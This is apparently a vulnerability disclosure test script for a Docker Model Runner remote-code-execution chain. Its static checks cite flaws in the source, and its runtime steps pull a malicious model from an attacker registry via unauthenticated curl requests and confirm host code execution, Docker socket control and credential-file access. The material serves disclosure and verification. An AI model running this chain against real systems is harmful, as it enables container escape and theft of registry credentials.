README.md
Rendering markdown...
#!/usr/bin/env python3
#
# Claim validation for the Docker Model Runner RCE.
#
# Static tests read the source. They show the bug exists in the codebase but
# don't show it can actually be triggered. Runtime tests do the latter.
#
# Usage:
# python3 test_claims.py # all tests
# python3 test_claims.py --json # machine output
# python3 test_claims.py --runtime-only # skip static
# python3 test_claims.py --static-only # skip runtime
#
# Env:
# REPO_ROOT path to the model-runner repo (default: ../ from this file)
# REGISTRY_HOST registry host for HTTP probes (default: localhost)
# REGISTRY_PORT registry port (default: 5555)
# PROOF_FILE where the payload writes proof (default: /tmp/poc_rce_proof)
import hashlib
import json
import os
import re
import subprocess
import sys
import time
import urllib.request
import urllib.error
from pathlib import Path
REPO_ROOT = Path(os.environ.get("REPO_ROOT", Path(__file__).resolve().parent.parent))
REGISTRY_HOST = os.environ.get("REGISTRY_HOST", "localhost")
REGISTRY_PORT = int(os.environ.get("REGISTRY_PORT", "5555"))
PROOF_FILE = os.environ.get("PROOF_FILE", "/tmp/poc_rce_proof")
# Model Runner is on the host so it reaches the registry via localhost
# (port-mapped from the registry container).
PULL_MODEL_NAME = f"localhost:{REGISTRY_PORT}/evil/rce-model:latest"
MODEL_RUNNER_URL = "http://model-runner.docker.internal"
GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
BOLD = "\033[1m"
RESET = "\033[0m"
if not sys.stdout.isatty() or "--json" in sys.argv:
GREEN = RED = YELLOW = CYAN = BOLD = RESET = ""
results = []
def log_result(claim_id, description, passed, detail="", proves=""):
status_str = {True: f"{GREEN}PASS{RESET}", False: f"{RED}FAIL{RESET}",
None: f"{YELLOW}SKIP{RESET}"}[passed]
results.append({
"id": claim_id, "desc": description, "passed": passed,
"detail": detail, "proves": proves,
})
print(f" [{status_str}] {claim_id}: {description}")
if detail and "--json" not in sys.argv:
for line in detail.strip().split("\n"):
print(f" {line}")
def read_file(path):
full = REPO_ROOT / path
if not full.exists():
return None
return full.read_text()
def grep_file(path, pattern):
content = read_file(path)
if content is None:
return []
return [(i, line.strip()) for i, line in enumerate(content.split("\n"), 1)
if re.search(pattern, line)]
def http_get(url, timeout=5):
try:
resp = urllib.request.urlopen(urllib.request.Request(url), timeout=timeout)
return resp.status, resp.read()
except urllib.error.HTTPError as e:
return e.code, e.read()
except Exception as e:
return None, str(e)
def docker_run(args, timeout=30):
# minimal container - truly unprivileged
cmd = ["docker", "run", "--rm", "--no-healthcheck",
"--security-opt=no-new-privileges",
"curlimages/curl:latest"] + args
try:
r = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
return r.returncode, r.stdout, r.stderr
except subprocess.TimeoutExpired:
return -1, "", "timeout"
except FileNotFoundError:
return -1, "", "docker not found"
# Claim 1 - blob digest verification is absent (static)
def test_claim_1():
print(f"\n{BOLD}{CYAN}Claim 1: blob digest verification is absent{RESET}")
blobs_go = read_file("pkg/distribution/internal/store/blobs.go")
if blobs_go is None:
log_result("1a", "blobs.go not found", False,
f"Expected at {REPO_ROOT}/pkg/distribution/internal/store/blobs.go")
return
lines = blobs_go.split("\n")
# 1a - find io.Copy in WriteBlobWithResume, confirm no hash after it
in_func = False
io_copy_line = None
rename_line = None
for i, line in enumerate(lines, 1):
if "func" in line and "WriteBlobWithResume" in line:
in_func = True
if in_func:
if "io.Copy(f, r)" in line and io_copy_line is None:
io_copy_line = i
if io_copy_line and "os.Rename" in line and rename_line is None:
rename_line = i
hash_between = False
if io_copy_line and rename_line:
for i in range(io_copy_line, rename_line):
if "SHA256" in lines[i - 1] or "sha256" in lines[i - 1].lower():
if "oci.SHA256" in lines[i - 1]:
hash_between = True
log_result("1a",
"WriteBlobWithResume: io.Copy at line {}, os.Rename at line {}, no hash between".format(
io_copy_line, rename_line),
io_copy_line is not None and rename_line is not None and not hash_between,
f"Lines {io_copy_line}-{rename_line}: raw copy then immediate rename, no verification.",
proves="Download path writes bytes to disk and renames to final path with "
"no digest check anywhere in between.")
# 1b - SHA256 exists but only in the resume path (before io.Copy)
hash_go = read_file("pkg/distribution/oci/hash.go")
sha256_exists = hash_go is not None and "func SHA256(" in hash_go
sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go", r"oci\.SHA256\(")
all_before_copy = all(ln < (io_copy_line or 0) for ln, _ in sha256_calls)
log_result("1b",
"SHA256 exists but only called in the resume path (before io.Copy)",
sha256_exists and len(sha256_calls) > 0 and all_before_copy,
f"oci.SHA256 calls at lines: {[ln for ln, _ in sha256_calls]}. "
f"io.Copy at line {io_copy_line}. All calls precede the download.",
proves="The hash function exists but is never applied to a fresh download. "
"It's only used to decide whether an .incomplete file is already done.")
# 1c - nothing after io.Copy verifies the content before rename
post_copy_checks = []
if io_copy_line and rename_line:
check_words = ["digest", "hash", "verify", "compare", "SHA256", "sha256", "checksum"]
for i in range(io_copy_line + 1, rename_line):
line = lines[i - 1]
if any(w in line for w in check_words) and not line.strip().startswith("//"):
post_copy_checks.append((i, line.strip()))
log_result("1c",
"No verification code between io.Copy and os.Rename",
len(post_copy_checks) == 0,
f"Checked lines {io_copy_line+1}-{rename_line-1}: "
f"{'no verification found' if not post_copy_checks else post_copy_checks}",
proves="A malicious registry can serve any bytes for a given declared digest "
"and Model Runner stores them without complaint.")
# Claim 2 - registry serves model, Model Runner accepts it (runtime)
def test_claim_2():
print(f"\n{BOLD}{CYAN}Claim 2: malicious registry accepted by Model Runner{RESET}")
# 2a - PoC registry is up and internally consistent
status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
if status is None or status != 200:
log_result("2a", "Registry self-test", None,
f"Registry not reachable at {REGISTRY_HOST}:{REGISTRY_PORT}: {body}")
log_result("2b", "Model Runner accepts pull", None, "Registry not running")
log_result("2c", "Pulled model appears in model list", None, "Registry not running")
return
selftest = json.loads(body)
log_result("2a", "Registry self-test passes (digests consistent, valid OCI)",
selftest["passed"],
f"Blob count: {selftest['blob_count']}, errors: {selftest['errors']}",
proves="The PoC serves valid OCI content. All digests match, this isn't "
"a malformed artifact.")
# 2b - pull the model via Model Runner from inside a container
rc, stdout, stderr = docker_run([
"sh", "-c",
f'curl -sf -X POST {MODEL_RUNNER_URL}/api/pull '
f'-H "Content-Type: application/json" '
f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
], timeout=60)
if rc == -1 and "docker not found" in stderr:
log_result("2b", "Pull model via Model Runner", None, "docker not available")
log_result("2c", "Pulled model in model list", None, "docker not available")
return
if "Could not resolve host" in stdout or "Connection refused" in stdout:
log_result("2b", "Pull model via Model Runner", None,
f"Model Runner not reachable: {stdout[:200]}")
log_result("2c", "Pulled model in model list", None, "Model Runner not reachable")
return
pull_ok = rc == 0 and "error" not in stdout.lower()
log_result("2b", "Model Runner pulls from a malicious registry without complaint",
pull_ok,
f"Exit code: {rc}\nResponse: {stdout[:300]}",
proves="Model Runner accepted a model from an attacker-controlled registry. "
"Pull completed, no digest verification failure.")
# 2c - verify the model appears in the list
rc2, stdout2, stderr2 = docker_run([
"sh", "-c",
f'curl -sf {MODEL_RUNNER_URL}/api/tags 2>&1'
], timeout=15)
model_listed = PULL_MODEL_NAME.replace(":latest", "") in stdout2 or "evil" in stdout2.lower()
log_result("2c", "Pulled model appears in Model Runner's model list",
model_listed if rc2 == 0 else None,
f"Model list response: {stdout2[:300]}",
proves="Malicious model is stored and available for inference.")
# Claim 3 - Python backends enable trust_remote_code (static + runtime)
def test_claim_3():
print(f"\n{BOLD}{CYAN}Claim 3: Python backends enable trust_remote_code{RESET}")
# 3a - Go side doesn't pass --no-trust-remote-code anywhere
backend_files = [
("vllm", "pkg/inference/backends/vllm/vllm.go"),
("vllm-metal", "pkg/inference/backends/vllm/vllm_metal.go"),
("vllm-config", "pkg/inference/backends/vllm/vllm_config.go"),
("mlx", "pkg/inference/backends/mlx/mlx.go"),
("sglang", "pkg/inference/backends/sglang/sglang.go"),
]
trust_flag_found = {}
for name, path in backend_files:
content = read_file(path)
if content:
if "trust-remote-code" in content or "trust_remote_code" in content:
matches = grep_file(path, r"trust.remote.code")
trust_flag_found[name] = matches
log_result("3a",
"No backend passes --no-trust-remote-code or --trust-remote-code",
len(trust_flag_found) == 0,
f"Searched {len(backend_files)} backend files. "
f"Flag references: {trust_flag_found if trust_flag_found else 'none'}",
proves="The Go launcher never disables vLLM's default trust_remote_code behavior. "
"vLLM imports code referenced by auto_map in tokenizer_config.json. "
"(The actual trust_remote_code=True default lives in the upstream vLLM "
"package, not this repo. This test only confirms the Go side doesn't "
"override it.)")
# 3b - vllm-metal passes --model pointing at an unverified directory
vllm_metal = read_file("pkg/inference/backends/vllm/vllm_metal.go")
passes_model_path = vllm_metal is not None and '"--model"' in vllm_metal
log_result("3b",
"vllm-metal passes --model <path> where path is the unverified blob store",
passes_model_path,
"vllm_metal.go passes --model pointing to the bundle directory. The contents\n"
"come from the blob store, which has no integrity checks (claim 1).\n"
"AutoTokenizer.from_pretrained() with trust_remote_code=True then imports any\n"
".py referenced by auto_map in tokenizer_config.json.",
proves="The path given to vLLM points at attacker-controlled content. With "
"claim 3a, that means arbitrary Python import from the model dir.")
# Claim 4 - Python backends run without sandboxing (static)
def test_claim_4():
print(f"\n{BOLD}{CYAN}Claim 4: Python backends run without sandboxing{RESET}")
python_backends = {
"vllm": "pkg/inference/backends/vllm/vllm.go",
"vllm-metal": "pkg/inference/backends/vllm/vllm_metal.go",
"mlx": "pkg/inference/backends/mlx/mlx.go",
"sglang": "pkg/inference/backends/sglang/sglang.go",
"diffusers": "pkg/inference/backends/diffusers/diffusers.go",
}
unsandboxed = []
sandboxed = []
for name, path in python_backends.items():
matches = grep_file(path, r'SandboxConfig:\s*""')
if matches:
unsandboxed.append(f"{name} (line {matches[0][0]})")
else:
sandboxed.append(name)
log_result("4a",
f"All {len(python_backends)} Python backends have SandboxConfig=\"\"",
len(unsandboxed) == len(python_backends),
f"Unsandboxed: {unsandboxed}\nSandboxed: {sandboxed if sandboxed else 'none'}",
proves="No OS-level sandbox on any Python backend. Code imported via "
"trust_remote_code runs with the full privileges of the Model Runner "
"process (the Docker Desktop user).")
# 4b - contrast: llama.cpp IS sandboxed
llamacpp = grep_file("pkg/inference/backends/llamacpp/llamacpp.go",
r"SandboxConfig.*sandbox\.Configuration")
log_result("4b",
"llama.cpp (C++ backend) actually configures a sandbox",
len(llamacpp) > 0,
f"llama.cpp: {llamacpp}",
proves="The codebase knows how to sandbox backends. Python ones being unsandboxed "
"is a choice (or at least a gap), not a missing framework.")
# Claim 5 - internal API has no auth (static + runtime)
def test_claim_5():
print(f"\n{BOLD}{CYAN}Claim 5: internal API reachable without auth{RESET}")
# 5a - model-runner.docker.internal is the configured endpoint
launch_go = read_file("cmd/cli/commands/launch.go")
has_endpoint = launch_go is not None and "model-runner.docker.internal" in launch_go
log_result("5a-code",
"model-runner.docker.internal endpoint configured in launch.go",
has_endpoint,
proves="Docker Desktop exposes Model Runner to every container at this address.")
# 5b - no auth middleware on API handlers
handler_files = [
"pkg/ollama/http_handler.go",
"pkg/inference/scheduling/http_handler.go",
"pkg/inference/models/http_handler.go",
]
auth_evidence = []
for path in handler_files:
content = read_file(path)
if not content:
continue
for pattern in ["authMiddleware", "requireAuth", "checkAuth",
"apiKey", "api_key", "Authorization"]:
matches = grep_file(path, pattern)
for ln, line in matches:
# exclude: BearerToken (used for upstream registry auth), comments, tests
if ("BearerToken" not in line and "bearer" not in line.lower()
and not line.strip().startswith("//")):
auth_evidence.append(f"{path}:{ln}: {line}")
log_result("5b",
"No authentication middleware on API handlers",
len(auth_evidence) == 0,
f"Searched {len(handler_files)} handler files.\n"
f"Auth enforcement: {auth_evidence if auth_evidence else 'none'}",
proves="/api/pull and /engines/v1/chat/completions take requests from any "
"container with no credentials.")
# 5c - CORS only blocks requests WITH a disallowed Origin
cors_go = read_file("pkg/middleware/cors.go")
if cors_go:
has_origin_check = 'r.Header.Get("Origin")' in cors_go
# key line: `if origin != "" && !allowed` - empty origin is never blocked
allows_empty_origin = 'origin != "" && !allowed' in cors_go or \
'origin != ""' in cors_go
log_result("5c",
"CORS only blocks if Origin is set and not allowed (empty Origin passes)",
has_origin_check and allows_empty_origin,
'cors.go line 29: `if origin != "" && !allowed` -> 403.\n'
"Requests with no Origin (all container curl requests) are never blocked.\n"
"CORS is a browser-only thing.",
proves="The only access control (CORS) does nothing for container-to-API "
"requests. No defense against non-browser clients.")
# 5d - runtime: reach Model Runner from an unprivileged container
rc, stdout, stderr = docker_run([
"-s", "-o", "/dev/null", "-w", "%{http_code}",
f"{MODEL_RUNNER_URL}/api/tags"
], timeout=15)
if rc == -1 and "docker not found" in stderr:
log_result("5d-runtime", "Container can reach Model Runner API", None,
"docker not available")
return
status_code = stdout.strip()
if status_code in ("000", ""):
log_result("5d-runtime", "Container can reach Model Runner API", None,
f"Model Runner not reachable (HTTP {status_code}). "
"Is Docker Desktop Model Runner enabled?")
else:
log_result("5d-runtime",
f"Unprivileged container reaches Model Runner API (HTTP {status_code})",
status_code == "200",
f"Container ran with --no-healthcheck --security-opt=no-new-privileges.\n"
f"No Docker socket mount, no --privileged, no caps.",
proves="Unprivileged container with default config reaches the API.")
# Claim 6 - RCE on host as Docker Desktop user (runtime)
def test_claim_6():
print(f"\n{BOLD}{CYAN}Claim 6: code executes on host as Docker Desktop user{RESET}")
proof_path = Path(PROOF_FILE)
if not proof_path.exists():
log_result("6a", "Host-level code execution", None,
f"Proof file {PROOF_FILE} missing.\n"
"Run the full attack first (./run_poc.sh full)")
log_result("6b", "Host filesystem access", None, "Proof file missing")
log_result("6c", "Runs as Docker Desktop user", None, "Proof file missing")
return
try:
proof = json.loads(proof_path.read_text())
except (json.JSONDecodeError, OSError) as e:
log_result("6a", "Host-level code execution", None,
f"Proof file exists but is unreadable: {e}")
return
# 6a - code executed
log_result("6a", "Arbitrary code executed on host",
proof.get("rce") is True,
f"Hostname: {proof.get('hostname')}\n"
f"User: {proof.get('user')}\n"
f"PID: {proof.get('pid')}",
proves="evil_tokenizer.py ran and wrote proof to the HOST filesystem "
"(not inside a container).")
# 6b - host filesystem access
log_result("6b", "Process has host filesystem access",
proof.get("can_read_etc_passwd") is True,
f"Can read /etc/passwd: {proof.get('can_read_etc_passwd')}\n"
f"Can write /tmp: {proof.get('can_write_tmp')}\n"
f"Working dir: {proof.get('cwd')}\n"
f"Model dir: {proof.get('model_dir')}",
proves="Process can read sensitive host files (/etc/passwd) and write "
"to host directories (/tmp). Not sandboxed.")
# 6c - Docker Desktop user (not root, not container user)
uid_str = proof.get("uid", "")
user = proof.get("user", "")
is_host_user = user != "" and user != "root" and "uid=0" not in uid_str
log_result("6c", f"Runs as host user '{user}' (not root, not container user)",
is_host_user,
f"uid line: {uid_str}\n"
f"HOME: {proof.get('env_HOME')}",
proves="Code runs as the Docker Desktop user with their full privileges, "
"file access, network.")
# Container escape proof - host RCE can control the Docker daemon, which
# gives full container escape: unpriv container -> host RCE -> daemon -> any container.
# 6d - Docker socket accessible from host
socket_exists = proof.get("docker_socket_exists")
socket_writable = proof.get("docker_socket_writable")
if socket_exists is None:
log_result("6d", "Docker socket accessible from host-side payload", None,
"Proof file missing docker_socket fields (older payload)")
else:
log_result("6d", "Docker socket accessible from host-side payload",
socket_exists is True,
f"Socket exists: {socket_exists}\n"
f"Socket writable: {socket_writable}",
proves="Host-side payload can hit the Docker socket. Attacker controls "
"the daemon from code that started life in an unprivileged container.")
# 6e - can enumerate every running container
docker_ps = proof.get("docker_ps")
ps_count = proof.get("docker_ps_count", 0)
if docker_ps is None:
log_result("6e", "Host-side payload can enumerate all containers", None,
"docker ps not available or failed")
else:
log_result("6e", f"Host-side payload sees {ps_count} running container(s) via docker ps",
ps_count > 0,
f"docker ps output:\n{docker_ps}",
proves="From host-side RCE, attacker sees every container. With socket "
"write access they can exec into, stop, or create more.")
# 6f - Docker daemon version accessible
docker_ver = proof.get("docker_version")
if docker_ver is None:
log_result("6f", "Host-side payload can query Docker daemon", None,
"docker version not available or failed")
else:
log_result("6f", f"Host-side payload talks to Docker daemon (v{docker_ver})",
len(docker_ver) > 0,
f"Docker version: {docker_ver}",
proves="Payload talks to the Docker daemon API. Equivalent to having "
"the socket mounted: create privileged containers, mount the "
"host filesystem, pivot elsewhere.")
# 6g - Docker credentials readable
config_exists = proof.get("docker_config_exists")
has_auths = proof.get("docker_config_has_auths")
registries = proof.get("docker_config_registries", [])
if config_exists is None:
log_result("6g", "Docker registry credentials accessible from host", None,
"docker_config fields missing from proof")
elif not config_exists:
log_result("6g", "Docker registry credentials file not present", None,
"~/.docker/config.json doesn't exist (no registries logged in)")
else:
log_result("6g",
f"Docker config accessible ({len(registries)} registries)",
config_exists is True,
f"~/.docker/config.json exists: {config_exists}\n"
f"Has auth entries: {has_auths}\n"
f"Registries: {registries}\n"
"NOTE: actual credentials are NOT exfiltrated, only proving access.",
proves="Attacker can read Docker registry creds from the host. Supply chain "
"attacks: push malicious images to any registry the user is logged into.")
# Claim 7 - malicious content persists (static)
def test_claim_7():
print(f"\n{BOLD}{CYAN}Claim 7: malicious content persists in blob store{RESET}")
store_go = read_file("pkg/distribution/internal/store/store.go")
# 7a - no integrity check during store init/open
init_verifies = False
if store_go:
lines = store_go.split("\n")
in_init = False
for i, line in enumerate(lines, 1):
if re.match(r'func.*\b(New|Open|Init|Load)\b', line):
in_init = True
if in_init:
if any(w in line for w in ["SHA256", "verify", "integrity", "checksum"]):
if not line.strip().startswith("//"):
init_verifies = True
break
if line.startswith("}"):
in_init = False
log_result("7a", "No integrity check when the blob store is opened",
not init_verifies,
f"Checked every New/Open/Init/Load in store.go.\n"
f"Integrity check found: {init_verifies}",
proves="Once stored, a blob is never re-verified. A malicious model "
"survives Docker Desktop restarts.")
# 7b - hasBlob early-returns for existing blobs
has_blob = grep_file("pkg/distribution/internal/store/blobs.go", r"hasBlob\(")
early_return = grep_file("pkg/distribution/internal/store/blobs.go",
r"if hasBlob\b")
log_result("7b", "Existing blobs skip re-download (hasBlob early return)",
len(has_blob) > 0 and len(early_return) > 0,
f"hasBlob calls: {len(has_blob)}, early returns: {len(early_return)}",
proves="Re-pulling the same model skips download if blobs exist. Tampered "
"content never gets refreshed or re-verified.")
# Edge cases
def test_edge_cases():
print(f"\n{BOLD}{CYAN}Edge cases{RESET}")
# E1 - resume path only checks completeness, not fresh downloads
sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go",
r"oci\.SHA256\(existingFile\)")
compare_calls = grep_file("pkg/distribution/internal/store/blobs.go",
r"computedHash.*==.*diffID")
log_result("E1",
"Resume-path SHA256 only checks if an .incomplete file is already complete",
len(sha256_calls) > 0 and len(compare_calls) > 0,
"The SHA256 check runs only when an .incomplete file is sitting around from\n"
"a previous interrupted download. It checks whether the file is already complete\n"
"(hash matches diffID). It does not run on fresh downloads.",
proves="The presence of SHA256 in the resume path isn't digest verification of "
"downloaded content.")
# E2 - manifest not crypto-verified after fetch
# ComputeDigest() exists but isn't called during pull.
manifest_verify_calls = []
for path in ["pkg/distribution/oci/remote/remote.go",
"pkg/distribution/internal/store/store.go",
"pkg/distribution/distribution/client.go"]:
matches = grep_file(path, r"(\.ComputeDigest\(\)|verifyManifest|manifest.*SHA256)")
manifest_verify_calls.extend([(path, ln, line) for ln, line in matches
if not line.strip().startswith("//")])
compute_digest_def = grep_file("pkg/distribution/oci/manifest.go", r"func.*ComputeDigest")
log_result("E2",
"Manifest content not cryptographically verified after fetch",
len(manifest_verify_calls) == 0,
f"ComputeDigest() defined: {bool(compute_digest_def)}, "
f"called during pull: {bool(manifest_verify_calls)}\n"
f"Call sites found: {manifest_verify_calls if manifest_verify_calls else 'none'}",
proves="Trust comes entirely from TLS. A compromised registry or MITM with a "
"valid TLS cert can serve arbitrary manifests.")
# E3 - path traversal protections exist (showing what IS protected)
path_checks = grep_file("pkg/distribution/internal/bundle/unpack.go",
r"(validatePathWithinDirectory|filepath\.IsLocal)")
log_result("E3",
"Bundle unpacking has path traversal protections",
len(path_checks) > 0,
f"Safety checks found: {len(path_checks)} locations",
proves="Path traversal via layer annotations is blocked. The attack vector here "
"is code execution via trust_remote_code, not path traversal.")
# E4 - CORS is the only access control
cors_go = read_file("pkg/middleware/cors.go")
if cors_go:
origin_only = 'r.Header.Get("Origin")' in cors_go
log_result("E4",
"CORS (Origin check) is the only access control",
origin_only,
proves="No IP filtering, no auth tokens, no mTLS. Containers bypass CORS by "
"just not sending an Origin header.")
# Full attack chain (runtime)
def test_full_chain():
print(f"\n{BOLD}{CYAN}Full attack chain{RESET}")
try:
r = subprocess.run(["docker", "info"], capture_output=True, timeout=10)
if r.returncode != 0:
print(f" {YELLOW}SKIP{RESET}: docker not running")
return
except (FileNotFoundError, subprocess.TimeoutExpired):
print(f" {YELLOW}SKIP{RESET}: docker not available")
return
status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
if status is None or status != 200:
print(f" {YELLOW}SKIP{RESET}: registry not running at {REGISTRY_HOST}:{REGISTRY_PORT}")
return
rc, stdout, stderr = docker_run([
"-s", "-o", "/dev/null", "-w", "%{http_code}",
f"{MODEL_RUNNER_URL}/api/tags"
], timeout=15)
mr_status = stdout.strip()
if mr_status != "200":
print(f" {YELLOW}SKIP{RESET}: Model Runner not reachable (HTTP {mr_status})")
print(f" Make sure Docker Desktop Model Runner is enabled.")
try:
r = subprocess.run(["docker", "model", "list"], capture_output=True, timeout=10)
if r.returncode != 0:
print(f" 'docker model list' failed: {r.stderr[:200]}")
print(f" Your Docker Desktop may not support Model Runner.")
except FileNotFoundError:
print(f" 'docker model' command not found.")
return
print(f"\n Checking available Python backend...")
rc, stdout, stderr = docker_run([
"sh", "-c",
f'curl -sf {MODEL_RUNNER_URL}/engines 2>&1 || echo ENGINES_FAIL'
], timeout=15)
print(f" Available engines: {stdout[:200]}")
for f in [PROOF_FILE, f"{PROOF_FILE}.flag"]:
try:
os.remove(f)
except FileNotFoundError:
pass
print(f"\n Step 1: pulling model from malicious registry...")
rc, stdout, stderr = docker_run([
"sh", "-c",
f'curl -sf -X POST {MODEL_RUNNER_URL}/api/pull '
f'-H "Content-Type: application/json" '
f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
], timeout=90)
print(f" Response: {stdout[:300]}")
if "error" in stdout.lower() and rc != 0:
log_result("CHAIN-1", "Pull from malicious registry", False,
f"Pull failed: {stdout[:300]}")
return
log_result("CHAIN-1", "Model pulled from malicious registry",
"error" not in stdout.lower(),
f"Response: {stdout[:200]}",
proves="Model Runner accepted the malicious model from the attacker registry.")
status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/requests")
if status == 200:
reqs = json.loads(body)
blob_reqs = [r for r in reqs if "/blobs/" in r["path"]]
manifest_reqs = [r for r in reqs if "/manifests/" in r["path"]]
print(f" Registry saw: {len(manifest_reqs)} manifest + {len(blob_reqs)} blob requests")
print(f"\n Step 2: triggering inference (this loads the model + evil tokenizer)...")
print(f" Might take 30-120s if the Python backend has to start...")
rc, stdout, stderr = docker_run([
"sh", "-c",
f'curl -sf --max-time 120 -X POST '
f'{MODEL_RUNNER_URL}/engines/v1/chat/completions '
f'-H "Content-Type: application/json" '
f'-d \'{{"model": "{PULL_MODEL_NAME}", '
f'"messages": [{{"role": "user", "content": "hello"}}]}}\' 2>&1'
], timeout=150)
print(f" Response: {stdout[:300]}")
# Inference may fail (model is too small, OOM, etc.) but the tokenizer
# import happens at LOAD time, before inference starts. Check the proof.
log_result("CHAIN-2", "Inference request sent (import happens during model load)",
rc != -1,
f"Response: {stdout[:200]}\n"
"NOTE: inference failure is expected with this tiny model. The import-time "
"code execution happens before inference runs.",
proves="Model loading was triggered. evil_tokenizer.py gets imported "
"during AutoTokenizer.from_pretrained().")
print(f"\n Step 3: checking for RCE proof on host...")
# The backend might still be coming up
for attempt in range(6):
if Path(PROOF_FILE).exists() or Path(f"{PROOF_FILE}.flag").exists():
break
if attempt < 5:
time.sleep(2)
proof_path = Path(PROOF_FILE)
if proof_path.exists():
try:
proof = json.loads(proof_path.read_text())
log_result("CHAIN-3", "RCE CONFIRMED, arbitrary code executed on host",
proof.get("rce") is True,
json.dumps(proof, indent=2),
proves="A container with no special privileges got arbitrary "
"code execution on the Docker host via two HTTP requests.")
except json.JSONDecodeError:
content = proof_path.read_text()
log_result("CHAIN-3", "RCE CONFIRMED, proof file written on host",
len(content) > 0,
f"Content: {content[:500]}",
proves="Code executed on the host and wrote to the host filesystem.")
elif Path(f"{PROOF_FILE}.flag").exists():
log_result("CHAIN-3", "RCE CONFIRMED, flag file written on host", True,
f"Flag: {Path(f'{PROOF_FILE}.flag').read_text()}",
proves="Code executed on the host.")
else:
log_result("CHAIN-3", "RCE proof file not found on host", False,
f"Expected at: {PROOF_FILE}\n"
"Possible reasons:\n"
" 1. No Python backend (vllm-metal/vllm/mlx/sglang) installed\n"
" 2. Model loading failed before the tokenizer import\n"
" 3. Selected backend was llama.cpp (C++, doesn't import .py)\n"
" 4. Proof file path is different on this system")
# Summary
def print_summary():
print(f"\n{'='*72}")
print(f"{BOLD}CLAIMS MATRIX{RESET}")
print(f"{'='*72}")
static_tests = [r for r in results if not r["id"].startswith(("CHAIN", "2", "5d", "6"))]
runtime_tests = [r for r in results if r["id"].startswith(("CHAIN", "2", "5d", "6"))]
print(f"\n{BOLD}Static analysis (from source code):{RESET}")
for r in static_tests:
status = {True: f"{GREEN}PROVEN{RESET}", False: f"{RED}DISPROVEN{RESET}",
None: f"{YELLOW}UNTESTED{RESET}"}[r["passed"]]
print(f" {r['id']:12s} [{status}] {r['desc']}")
if r.get("proves") and r["passed"] is True:
print(f" -> {r['proves'][:100]}")
print(f"\n{BOLD}Runtime (live exploitation):{RESET}")
for r in runtime_tests:
status = {True: f"{GREEN}PROVEN{RESET}", False: f"{RED}DISPROVEN{RESET}",
None: f"{YELLOW}UNTESTED{RESET}"}[r["passed"]]
print(f" {r['id']:12s} [{status}] {r['desc']}")
if r.get("proves") and r["passed"] is True:
print(f" -> {r['proves'][:100]}")
passed = sum(1 for r in results if r["passed"] is True)
failed = sum(1 for r in results if r["passed"] is False)
skipped = sum(1 for r in results if r["passed"] is None)
print(f"\n{'='*72}")
print(f"{BOLD}TOTALS{RESET}")
print(f" {GREEN}Proven: {passed}{RESET} | "
f"{RED}Disproven: {failed}{RESET} | "
f"{YELLOW}Untested: {skipped}{RESET} | "
f"Total: {len(results)}")
static_passed = all(r["passed"] is True for r in static_tests if r["passed"] is not None)
runtime_passed = all(r["passed"] is True for r in runtime_tests if r["passed"] is not None)
any_runtime_tested = any(r["passed"] is not None for r in runtime_tests)
print()
if static_passed:
print(f" {GREEN}Source: all claims validated{RESET}")
print(f" Bug exists in the codebase as described.")
else:
print(f" {RED}Source: some claims failed{RESET}")
for r in static_tests:
if r["passed"] is False:
print(f" FAILED: {r['id']}: {r['desc']}")
if any_runtime_tested:
if runtime_passed:
print(f" {GREEN}Runtime: all claims validated{RESET}")
print(f" Attack chain works end-to-end.")
else:
runtime_fails = [r for r in runtime_tests if r["passed"] is False]
runtime_ok = [r for r in runtime_tests if r["passed"] is True]
if runtime_fails:
print(f" {RED}Runtime: some claims failed{RESET}")
for r in runtime_fails:
print(f" FAILED: {r['id']}: {r['desc']}")
if runtime_ok:
print(f" {GREEN}Runtime: {len(runtime_ok)} claims validated{RESET}")
else:
print(f" {YELLOW}Runtime: not tested{RESET}")
print(f" Needs: Docker Desktop with Model Runner + a Python backend")
if "--json" in sys.argv:
print("\n--- JSON ---")
print(json.dumps({
"results": results,
"summary": {
"passed": passed, "failed": failed, "skipped": skipped,
"static_validated": static_passed,
"runtime_validated": runtime_passed if any_runtime_tested else None,
}
}, indent=2))
return failed == 0
def main():
if not (REPO_ROOT / "pkg").exists():
print(f"ERROR: REPO_ROOT={REPO_ROOT} doesn't contain pkg/")
print(f"Set REPO_ROOT env var to the model-runner repo root.")
sys.exit(2)
print(f"{BOLD}{'='*72}")
print(f"Docker Model Runner vulnerability claim validation")
print(f"{'='*72}{RESET}")
print(f" Repo: {REPO_ROOT}")
print(f" Registry: {REGISTRY_HOST}:{REGISTRY_PORT}")
print(f" Pull as: {PULL_MODEL_NAME}")
print(f" Proof: {PROOF_FILE}")
skip_static = "--runtime-only" in sys.argv
skip_runtime = "--static-only" in sys.argv
if not skip_static:
test_claim_1()
test_claim_3()
test_claim_4()
test_claim_5()
test_claim_7()
test_edge_cases()
if not skip_runtime:
test_claim_2()
test_claim_6()
test_full_chain()
success = print_summary()
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()